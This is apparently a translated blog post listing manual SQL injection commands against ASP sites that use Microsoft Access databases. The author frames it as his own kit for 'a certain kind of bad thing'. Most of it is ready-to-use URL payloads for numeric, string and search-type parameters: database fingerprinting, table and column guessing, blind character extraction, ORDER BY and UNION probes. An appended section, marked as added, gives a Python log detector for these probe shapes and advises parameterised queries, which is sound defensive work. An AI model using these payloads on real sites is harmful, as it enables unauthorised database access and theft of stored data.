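Detailed Commands for Manual ACCESS Injection
I've recently been doing a certain kind of bad thing, hehe, so I'm noting the commands down first to save searching all over for them later. Handy, ha.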
1. ACCESS
(1) Numeric type
Identify the database: http://127.0.0.1/a.asp?id=7 and exists (select count(*) from msysobjects)
Guess the table name: http://127.0.0.1/a.asp?id=7 and exists (select count(*) from table_name)
Guess the column name: http://127.0.0.1/a.asp?id=7 and (select count(column_name) from table_name)>0
Guess the value: http://127.0.0.1/a.asp?id=7 and (select top 1 asc(mid(column_name,1,1)) from table_name)>N
Guess the number of columns: http://127.0.0.1/a.asp?id=7 order by N
UNION query: http://127.0.0.1/a.asp?id=7 union select 1,2,3,4... from table_name
Cross-database: http://127.0.0.1/a.asp?id=7 and exists (select count(*) from db_path.table_name)
(2) String type
Identify the database: http://127.0.0.1/a.asp?id=4ed7' and exists (select count(*) from msysobjects) and ''='
Guess the table name: http://127.0.0.1/a.asp?id=4ed7' and exists (select count(*) from table_name) and ''='
Guess the column name: http://127.0.0.1/a.asp?id=4ed7' and (select count(column_name) from table_name)>0 and ''='
Guess the value: http://127.0.0.1/a.asp?id=4ed7' and (select top 1 asc(mid(column_name,1,1)) from table_name)>N and ''='
Guess the number of columns: http://127.0.0.1/a.asp?id=4ed7' order by N and ''='
UNION query: http://127.0.0.1/a.asp?id=4ed7' union select 1,2,3,4... from table_name and ''='
Cross-database: http://127.0.0.1/a.asp?id=4ed7' and exists (select count(*) from db_path.table_name) and ''='
(3) Search type
Identify the database: http://127.0.0.1/a.asp?id=%54%20%87%' and exists (select count(*) from msysobjects) and '%'='
Guess the table name: http://127.0.0.1/a.asp?id=%54%20%87%' and exists (select count(*) from table_name) and '%'='
Guess the column name: http://127.0.0.1/a.asp?id=%54%20%87%' and (select count(column_name) from table_name)>0 and '%'='
Guess the value: http://127.0.0.1/a.asp?id=%54%20%87%' and (select top 1 asc(mid(column_name,1,1)) from table_name)>N and '%'='
Guess the number of columns: http://127.0.0.1/a.asp?id=%54%20%87%' order by N and '%'='
UNION query: http://127.0.0.1/a.asp?id=%54%20%87%' union select 1,2,3,4... from table_name and '%'='
Cross-database: http://127.0.0.1/a.asp?id=%54%20%87%' and exists (select count(*) from db_path.table_name) and '%'='
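Added example, not part of the original post: a small log detector for the probe shapes listed above, run over constructed IIS-style log lines. The rule names, regexes, seven-field log layout, sample addresses and the tbl/col names are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# One rule per probe shape from the list above (regexes are this example's own).
RULES = [
    ("access-fingerprint", re.compile(r"\bfrom\s+msysobjects\b")),
    ("count-subquery", re.compile(r"\(\s*select\s+count\s*\(")),
    ("blind-char-extract", re.compile(r"\basc\s*\(\s*mid\s*\(")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
]

# Constructed sample: date time client method uri-stem uri-query status
SAMPLE_LOG = """\
2008-07-01 10:00:01 192.0.2.10 GET /a.asp id=7 200
2008-07-01 10:00:05 192.0.2.66 GET /a.asp id=7+and+exists+(select+count(*)+from+msysobjects) 500
2008-07-01 10:00:09 192.0.2.66 GET /a.asp id=7%20order%20by%205 200
2008-07-01 10:00:12 192.0.2.66 GET /a.asp id=7+and+(select+top+1+asc(mid(col,1,1))+from+tbl)>96 200
2008-07-01 10:00:20 192.0.2.10 GET /news.asp q=order+by+date 200
"""

def classify(query: str) -> list[str]:
    """Return the names of all rules matched by one raw query string."""
    text = query
    for _ in range(2):  # decode twice so double-encoded payloads are seen
        text = unquote_plus(text)
    text = re.sub(r"\s+", " ", text.lower())
    return [name for name, rx in RULES if rx.search(text)]

def scan(log_text: str) -> dict[str, set[str]]:
    """Map each client address to the set of probe kinds it sent."""
    hits: dict[str, set[str]] = {}
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7 or line.startswith("#"):
            continue  # skip header and malformed lines
        matched = classify(fields[5])
        if matched:
            hits.setdefault(fields[2], set()).update(matched)
    return hits

def suspects(hits: dict[str, set[str]], min_kinds: int = 2) -> list[str]:
    """Clients that sent several distinct probe kinds, i.e. a probing sequence."""
    return sorted(c for c, kinds in hits.items() if len(kinds) >= min_kinds)

if __name__ == "__main__":
    for client, kinds in scan(SAMPLE_LOG).items():
        print(client, sorted(kinds))
```

Detection of this kind only surfaces the probing; the fix on the application side is to pass id to the query as a typed parameter instead of concatenating it into the SQL string.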
Original address: http://www.guwei.org/2008/07/accessshougongzhurux.html
Please credit the source when reposting. Many thanks!